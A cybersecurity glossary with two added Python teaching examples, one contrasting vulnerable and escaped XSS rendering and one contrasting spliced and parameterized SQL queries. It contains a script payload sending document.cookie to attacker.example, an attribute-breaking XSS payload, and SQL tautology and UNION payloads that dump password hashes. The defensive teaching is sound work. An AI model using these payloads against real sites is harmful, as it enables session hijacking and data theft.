Glossary of Cybersecurity Terms

Access control: A security measure that restricts access to a system, network, or data, ensuring that only authorized individuals can access them.

Advanced Encryption Standard (AES): A widely used symmetric block cipher, standardized by NIST, that encrypts data in 128-bit blocks using a 128-, 192- or 256-bit key; the same key is used for encryption and decryption.

Advanced Persistent Threat (APT): A targeted and sophisticated attack, usually by a well-resourced group, in which the attacker gains access to a network or system and remains undetected for an extended period to gather information or cause damage.

Antivirus software: A program designed to detect and remove computer viruses and other malicious software.

Audit Trail: A chronological record of system activities, including user logins, file accesses, and system changes, used to track system usage and detect security violations.

Authentication: The process of verifying the identity of a user, device, or system before granting access to protected resources.

Authorization: The process of deciding whether an already authenticated user, device or process is permitted to perform a requested action on a resource, based on its assigned permissions or roles.

Backdoor: A hidden method of bypassing normal authentication or access controls, whether planted by an attacker to regain entry later or built into a product by its developer or vendor.

Behavioral analytics: A technique that uses machine learning algorithms to analyze user behavior, identifying anomalies that may indicate potential threats.

Botnet: A network of compromised computers or devices, controlled remotely by an attacker to perform malicious activities.

Brute-force attack: A method of recovering a password or cryptographic key by systematically trying candidate values until the correct one is found. Its feasibility depends on the size of the search space and the rate at which guesses can be tried, which is why long random keys, slow password hashing and rate limiting are effective defences.

Cross-site scripting (XSS): A type of security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users.
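
The vulnerable pattern behind reflected XSS, shown next to its fix. This is an added example written for this glossary, not code from any product: a search page that reflects the user's query into the response, once verbatim and once through Python's `html.escape`. The payloads and the `is_script_active` check are constructed for illustration.

```python
import re
from html import escape


def render_results_vulnerable(query: str) -> str:
    """Reflects the search term into the page verbatim: the bug that XSS exploits."""
    return f'<h1>Results for: {query}</h1>\n<input name="q" value="{query}">'


def render_results_escaped(query: str) -> str:
    """Escapes for both the element-body and the attribute context.

    quote=True (the default) also encodes " and ', which matters inside value="...".
    """
    safe = escape(query, quote=True)
    return f'<h1>Results for: {safe}</h1>\n<input name="q" value="{safe}">'


# Constructed payloads. The first is the classic <script> injection into element text.
# The second never needs a '<' at all: it closes the value="..." attribute and adds an
# event handler, which is why escaping only angle brackets is not enough.
BODY_PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(document.domain)'

ACTIVE_RE = re.compile(r'<script|\son\w+\s*=\s*"', re.IGNORECASE)


def is_script_active(markup: str) -> bool:
    """Crude stand-in for a browser: is there a live <script> tag or inline event handler?"""
    return ACTIVE_RE.search(markup) is not None


if __name__ == "__main__":
    for payload in (BODY_PAYLOAD, ATTRIBUTE_PAYLOAD):
        print("vulnerable:", is_script_active(render_results_vulnerable(payload)))
        print("escaped:   ", is_script_active(render_results_escaped(payload)))
```

Escaping is context-specific: `html.escape` is correct for element text and quoted attributes, but data placed inside a `<script>` block, a URL or a CSS value needs the encoder for that context, and a Content Security Policy limits the damage when an encoder is missed.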

Cyber attack: An intentional and malicious attempt to damage, disrupt, or gain unauthorized access to a computer system or network.

Cyber espionage: The use of cyber techniques to gather sensitive information from other countries, companies or individuals for political, economic or military purposes.

Cyber kill chain: A model, originally published by Lockheed Martin, that describes an intrusion as a sequence of stages (reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on objectives) so that defenders can map detections and controls to each stage.

Cybercrime: Criminal activity that is carried out using the internet or other digital technologies, such as hacking, identity theft, or fraud.

Cybersecurity: The practice of protecting computer systems, networks, and data from unauthorized access, theft, damage, or disruption.

Cybersecurity Framework: A framework developed by the National Institute of Standards and Technology (NIST) to help organizations manage and reduce cybersecurity risks.

Cybersecurity incident: Any event that compromises, or could reasonably be expected to compromise, the confidentiality, integrity or availability of information or information systems.

Cybersecurity Risk: The potential harm to an organization resulting from the exploitation of vulnerabilities in its systems, networks, or processes.

Cybersecurity Threat: Any potential danger to a computer system or network that could result in damage, unauthorized access, or data loss.

Cyberwarfare: The use of computer technology to conduct acts of war, including espionage, sabotage, and attacks on critical infrastructure.

Data exfiltration: The unauthorized transfer of data from a network or system to an external location or server.

Decryption: The process of converting encrypted data back into its original form using a decryption key.

Denial of Service (DoS) attack: An attack that makes a system or service unavailable to its legitimate users, typically by flooding it with traffic or by exhausting a resource such as memory, open connections or CPU time.

Digital certificate: A signed digital document, issued by a certificate authority (CA), that binds a public key to the identity of an entity such as a website or individual; a relying party verifies the CA's signature before trusting that key to establish secure communication.

Digital forensics: The process of collecting, analyzing, and preserving electronic evidence to investigate cybercrime or other computer-related incidents.

Distributed Denial of Service (DDoS): An attack in which multiple systems are used to flood a network or server with traffic, causing it to become unavailable.

Encryption: The process of converting plaintext into ciphertext that can only be read by someone who has the appropriate decryption key.

Endpoint detection and response (EDR): A security solution that monitors and responds to threats at the endpoint or device level.

End-to-end encryption: A design in which data is encrypted on the sender's device and decrypted only on the recipient's device, so that intermediaries such as the service provider's servers relay ciphertext but cannot read it.

Exploit: A piece of code or software that takes advantage of a vulnerability in a computer system or application to carry out malicious activities.

Exploit kit: A packaged set of exploits, typically served from a compromised or malicious website, that fingerprints a visitor's browser and plugins and delivers a matching exploit to install malware without user interaction.

Firewall: A security system that monitors and controls incoming and outgoing network traffic based on pre-defined security rules.

Hacking: The unauthorized access to or manipulation of computer systems, networks, or data.

Machine learning: A type of artificial intelligence that enables computers to learn and improve their performance by analyzing and identifying patterns in data.

Malware analysis: The process of analyzing and understanding the behavior of malware to develop detection and mitigation strategies.

Malware: Malicious software that is designed to damage or disrupt a computer system, steal sensitive information, or gain unauthorized access to a network.

Man-in-the-middle (MITM): An attack in which an attacker intercepts communication between two parties, allowing them to eavesdrop, modify, or inject false information.

Network security: The protection of a computer network from unauthorized access, theft, or damage.

Network segmentation: The practice of dividing a network into smaller, isolated segments to reduce the impact of a potential security breach.

Patch: A software update that fixes a known vulnerability or bug in an application or system.

Penetration testing: A simulated attack on a computer system, network, or application to identify vulnerabilities and test the effectiveness of security measures.

Phishing: A type of cyber attack where an attacker sends fraudulent emails or messages to trick individuals into providing sensitive information such as login credentials or financial information.

Public Key Infrastructure (PKI): The set of certificate authorities, policies and procedures used to issue, distribute, validate and revoke digital certificates, so that parties can trust a public key as belonging to a particular identity.

Ransomware: Malware that encrypts a victim's files or data, demanding payment in exchange for the decryption key.

Red teaming: An objective-driven exercise in which a team emulates a realistic adversary end to end, including social engineering, evasion and persistence, to test an organization's detection and response capabilities rather than only to enumerate vulnerabilities.

Rootkit: Malware that hides its own presence (processes, files, network connections) on a compromised system, typically by modifying the operating system or firmware, so that an attacker retains privileged access while evading detection and removal.

Sandbox: A virtual environment that isolates and executes untested or suspicious files or applications to prevent them from affecting the host system.

Secure Sockets Layer (SSL): The deprecated predecessor of TLS, originally used to secure e-commerce transactions and other sensitive data in transit. Every SSL version has known weaknesses and should be disabled in favour of TLS; the name survives mainly in informal usage and in terms such as "SSL certificate".

Security information and event management (SIEM): A solution that collects and analyzes security data from various sources to detect and respond to security incidents.

Side-channel attack: An attack that extracts secret information from a system's physical or observable behaviour, such as execution timing, cache usage, power consumption or electromagnetic emissions, rather than from a flaw in the algorithm itself.

Sniffer: A tool used to capture and analyze network traffic, often used by attackers to steal sensitive information.

Social engineering: A tactic used by attackers to manipulate individuals into divulging sensitive information or performing actions that are harmful to a system or network.

Spoofing: A technique used by attackers to disguise their identity or impersonate a legitimate user or system.

SQL injection: An attack in which untrusted input is concatenated into a database query so that it is interpreted as SQL rather than as data, letting the attacker read or modify records, bypass authentication or, in some database configurations, execute commands on the server. Parameterized queries, which send values separately from the statement text, prevent it.
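
The entry above in working form: an added example for this glossary (not code from any application) using Python's built-in `sqlite3` on a constructed in-memory user table. The vulnerable lookup splices the username into the SQL text; the safe one binds it as a parameter. The two payloads show the two classic outcomes, bypassing the WHERE clause and pulling other columns out through a UNION.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for an application's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "sha256$a1b2", "admin"), ("bob", "sha256$c3d4", "user")],
    )
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str):
    # Untrusted input becomes part of the SQL text, so a quote in it changes
    # the structure of the statement instead of being a value.
    query = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str):
    # The value travels separately from the statement; the driver never parses it as SQL.
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


# Constructed payloads. The first turns the WHERE clause into a tautology;
# the second appends a UNION that returns the password hashes through the
# same two result columns, and comments out the trailing quote with "--".
TAUTOLOGY = "x' OR '1'='1"
UNION_DUMP = "x' UNION SELECT password_hash, 'dumped' FROM users --"


if __name__ == "__main__":
    db = build_demo_db()
    print(find_user_vulnerable(db, TAUTOLOGY))   # every row, regardless of username
    print(find_user_vulnerable(db, UNION_DUMP))  # the password hashes
    print(find_user_safe(db, TAUTOLOGY))         # []: no user is literally named that
```

The fix is binding, not quoting: an input filter that strips quotes is easy to get wrong, whereas a bound parameter can never change the statement's structure no matter what it contains.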

Threat hunting: A proactive practice in which analysts search logs, endpoints and network data for signs of adversary activity that automated detections have missed, starting from a hypothesis about attacker behaviour rather than from an alert.

Threat intelligence: Information about potential cyber threats, including tactics, techniques, and procedures used by attackers, gathered through monitoring and analysis of cyber activity.

Transport Layer Security (TLS): A protocol used to establish secure communication over the internet, replacing SSL as the industry standard.

Trojan: Malware that appears to be a legitimate program but contains hidden malicious code that can damage or compromise a system.

Two-factor authentication (2FA): A form of multi-factor authentication that requires two factors from different categories, typically something the user knows (a password) and something the user has (a one-time code from an authenticator app, a hardware token or a passkey); two passwords do not count as two factors.

Virtual Private Network (VPN): A network technology that creates a secure and encrypted connection between a remote device and a private network.

Virus: Malware that attaches its code to legitimate programs or files and spreads when those are executed or opened, often damaging data or stealing information; unlike a worm, it needs a host file and usually some user action to propagate.

Vulnerability: A weakness in a computer system, network, or application that can be exploited by attackers to gain unauthorized access or steal sensitive information.

Vulnerability assessment: The process of identifying and evaluating weaknesses and vulnerabilities in a network or system.

Worm: Self-replicating malware that spreads across networks on its own, usually by exploiting vulnerabilities in exposed services, without needing a host program or user interaction.

Zero trust architecture: A security model that grants no implicit trust based on network location or device ownership; every access request is authenticated, authorized and, where possible, encrypted, with policy evaluated continuously against the user's identity, the device's state and the context of the request.

Zero-day exploit: Working exploit code for a vulnerability that the vendor does not know about or has not yet patched, so that targets have no fix available and signature-based defences are unlikely to detect it.

Zero-day vulnerability: A vulnerability in software or hardware that is unknown to the developer or vendor, or known but not yet addressed with a patch or update; the name refers to the zero days defenders have had to prepare for it.